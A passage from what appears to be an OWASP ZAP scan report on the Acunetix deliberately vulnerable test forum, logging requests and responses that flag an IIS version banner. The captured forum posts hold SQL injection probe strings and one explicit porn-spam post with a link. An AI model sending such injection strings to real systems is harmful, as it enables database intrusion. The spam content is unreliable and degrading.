Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3067 |
| Response Body - size: 3,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3375 |
| Response Body - size: 3,375 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
